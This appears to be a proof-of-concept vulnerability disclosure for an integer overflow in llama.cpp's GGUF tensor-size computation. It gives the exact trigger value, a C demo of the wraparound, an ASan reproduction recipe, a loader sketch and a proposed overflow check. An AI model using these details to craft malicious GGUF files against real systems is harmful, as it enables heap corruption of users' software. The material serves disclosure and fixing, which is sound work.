
PoC: Integer Overflow in ggml_nbytes() for Quantized GGUF Tensors

Vulnerability

Integer overflow in ggml_nbytes() (ggml/src/ggml.c:1273) and ggml_row_size() (ggml/src/ggml.c:1302) causes drastically undersized heap allocations when loading crafted GGUF files with quantized tensor types.

For quantized types (Q4_0 through Q8_K, where blck_size > 1), the computation ne[0] * type_size / blck_size overflows in the intermediate multiplication ne[0] * type_size before the division is applied, returning a tiny value (e.g., 4 bytes instead of the correct ~576 PB).
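
The numbers work out as follows. A minimal sketch of the wraparound, using the Q4_0 layout (blck_size = 32, type_size = 18 bytes per block, per ggml's type traits) and the ne[0] value from malicious.gguf:

#include <stdint.h>
#include <stdio.h>

int main(void) {
    uint64_t ne0       = 1024819115206086208ULL; // ne[0] from malicious.gguf
    uint64_t type_size = 18;                     // bytes per Q4_0 block
    uint64_t blck_size = 32;                     // elements per Q4_0 block

    // the intermediate product wraps modulo 2^64 before the division:
    // ne0 * 18 = 2^64 + 128, so only 128 survives the multiplication
    uint64_t wrapped = ne0 * type_size;
    printf("overflowed row size: %llu bytes\n",
           (unsigned long long)(wrapped / blck_size));         // prints 4

    // dividing first gives the true size for block-aligned ne0 (~576 PB)
    printf("correct row size:    %llu bytes\n",
           (unsigned long long)(ne0 / blck_size * type_size)); // 576460752303423492
    return 0;
}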

All existing overflow checks in the GGUF parser pass because they validate the final result (nelements/blck_size)*type_size, not the intermediate product.
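
A fix therefore has to guard the intermediate multiplication itself. A minimal sketch of such a check, using a hypothetical helper name (a real fix would belong in ggml_row_size() or the parser's tensor validation):

#include <stdbool.h>
#include <stdint.h>

// hypothetical overflow-aware row-size computation; returns false when
// ne0 * type_size would wrap, instead of silently truncating
static bool row_size_checked(uint64_t ne0, uint64_t type_size,
                             uint64_t blck_size, uint64_t * out) {
    if (type_size != 0 && ne0 > UINT64_MAX / type_size) {
        return false; // intermediate product would exceed 64 bits
    }
    *out = ne0 * type_size / blck_size;
    return true;
}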

Files

  • malicious.gguf - Crafted GGUF with Q4_0 tensor, ne[0]=1024819115206086208
  • craft_gguf.py - Script to generate malicious GGUF files (supports Q4_0 through Q8_K)
  • test_load.c - Test loader demonstrating the overflow (a sketch of such a loader appears after this list)
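
Since test_load.c itself is not reproduced here, the following is only a sketch of what such a loader looks like; gguf_init_from_file(), gguf_init_params, gguf_free(), and ggml_free() are ggml's public API (declared in ggml.h in older trees, gguf.h in newer ones):

#include "ggml.h"
#include <stdio.h>

int main(int argc, char ** argv) {
    if (argc != 2) {
        fprintf(stderr, "usage: %s model.gguf\n", argv[0]);
        return 1;
    }

    struct ggml_context * ctx = NULL;
    struct gguf_init_params params = {
        /*.no_alloc =*/ false, // allocate and read tensor data: the vulnerable path
        /*.ctx      =*/ &ctx,
    };

    // with the crafted ne[0], ggml_nbytes() undersizes the tensor buffer and
    // the subsequent tensor data read overflows the heap (reported by ASan)
    struct gguf_context * gctx = gguf_init_from_file(argv[1], params);
    if (!gctx) {
        fprintf(stderr, "failed to load %s\n", argv[1]);
        return 1;
    }

    gguf_free(gctx);
    ggml_free(ctx);
    return 0;
}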

Reproduction

# Build llama.cpp with ASan
mkdir -p build && cd build
cmake -DCMAKE_C_FLAGS="-fsanitize=address" -DCMAKE_CXX_FLAGS="-fsanitize=address" ..
cmake --build . --target llama-gguf

# Run (r = the gguf example's read mode)
./bin/llama-gguf malicious.gguf r

Impact

Heap buffer overflow via undersized allocation. Affects llama-quantize, llama-imatrix, control vector loading, and examples/gguf (all code paths that load tensor data with no_alloc=false). Variant of CVE-2026-27940/CVE-2026-33298.
